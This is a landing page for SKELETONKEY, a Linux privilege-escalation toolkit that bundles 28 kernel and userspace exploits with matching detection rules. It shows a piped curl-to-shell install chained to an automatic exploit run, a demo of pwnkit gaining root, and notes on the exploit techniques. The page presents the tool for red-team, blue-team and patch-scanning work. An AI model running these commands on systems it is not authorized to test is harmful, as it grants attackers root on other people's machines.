One curated binary. 28 Linux LPE exploits from 2016 → 2026. Detection rules in the box. One command picks the safest one and runs it.
$ curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh \
&& skeletonkey --auto --i-know
⚠ Authorized testing only — see ETHICS.md
Most Linux privesc tooling is broken in one of three ways:
SKELETONKEY is one binary, actively maintained, with detection rules for every CVE it bundles — same project for red and blue teams.
Structural exploits + page-cache writes. No per-kernel offsets needed.
--full-chainDefault returns EXPLOIT_FAIL honestly. With --full-chain + resolved offsets, runs the shared modprobe_path finisher.
One tested binary. --auto ranks vulnerable modules by safety and runs the safest. Honest scope reporting — never claims root it didn't actually get. No more curating stale PoC repos.
Auditd + sigma + yara + falco rules for every CVE. One command ships SIEM coverage: --detect-rules --format=auditd | sudo tee /etc/audit/rules.d/99-skeletonkey.rules.
skeletonkey --scan (no sudo needed) tells you which boxes still need patching. JSON output for CI gates. Fleet-scan tool included. No SaaS, no telemetry.
Reproducible LPE environment with public CVEs across a 10-year timeline. Each module documents the bug, the trigger, and the fix. Detection rules let you practice both sides.
--auto on a vulnerable Ubuntu 22.04 box:
$ id uid=1000(kara) gid=1000(kara) groups=1000(kara) $ skeletonkey --auto --i-know [*] auto: host=demo kernel=5.15.0-56-generic arch=x86_64 [*] auto: scanning 31 modules for vulnerabilities... [+] auto: dirty_pipe VULNERABLE (safety rank 90) [+] auto: cgroup_release_agent VULNERABLE (safety rank 98) [+] auto: pwnkit VULNERABLE (safety rank 100) [*] auto: 3 vulnerable modules found. Safest is 'pwnkit' (rank 100). [*] auto: launching --exploit pwnkit... [+] pwnkit: writing gconv-modules cache + payload.so... [+] pwnkit: execve(pkexec) with NULL argv + crafted envp... # id uid=0(root) gid=0(root) groups=0(root)
Safety ranking goes structural escapes → page-cache writes → userspace cred-races → kernel primitives → kernel races. The goal is to never crash a production box looking for root.
Most public PoC repos hardcode offsets for one kernel build and silently break elsewhere. SKELETONKEY refuses to ship fabricated offsets.
--full-chain finisher returns EXPLOIT_OK only when a setuid bash sentinel file actually appearsEXPLOIT_FAIL with diagnosticskeletonkey --dump-offsets (parses /proc/kallsyms or /boot/System.map) and upstream the entry via PR — see CONTRIBUTING.md# Install (x86_64 / arm64; checksum-verified) $ curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh # What's this box vulnerable to? (no sudo) $ skeletonkey --scan # Pick the safest LPE and run it $ skeletonkey --auto --i-know # Deploy detection rules (needs sudo to write into /etc/audit/rules.d/) $ skeletonkey --detect-rules --format=auditd \ | sudo tee /etc/audit/rules.d/99-skeletonkey.rules # Fleet scan — many hosts via SSH, aggregated JSON for SIEM $ ./tools/skeletonkey-fleet-scan.sh --binary skeletonkey \ --ssh-key ~/.ssh/id_rsa hosts.txt
v0.5.0 cut 2026-05-17. 28 verified modules build clean on Debian 13 (kernel 6.12) and refuse cleanly on patched hosts; 3 further modules (dirtydecrypt, fragnesia, pack2theroot) are ported from public PoCs but not yet VM-verified. Empirical end-to-end validation on a vulnerable-kernel VM matrix is the next roadmap item; until then, the corpus is best understood as "compiles + detects + structurally correct + honest on failure."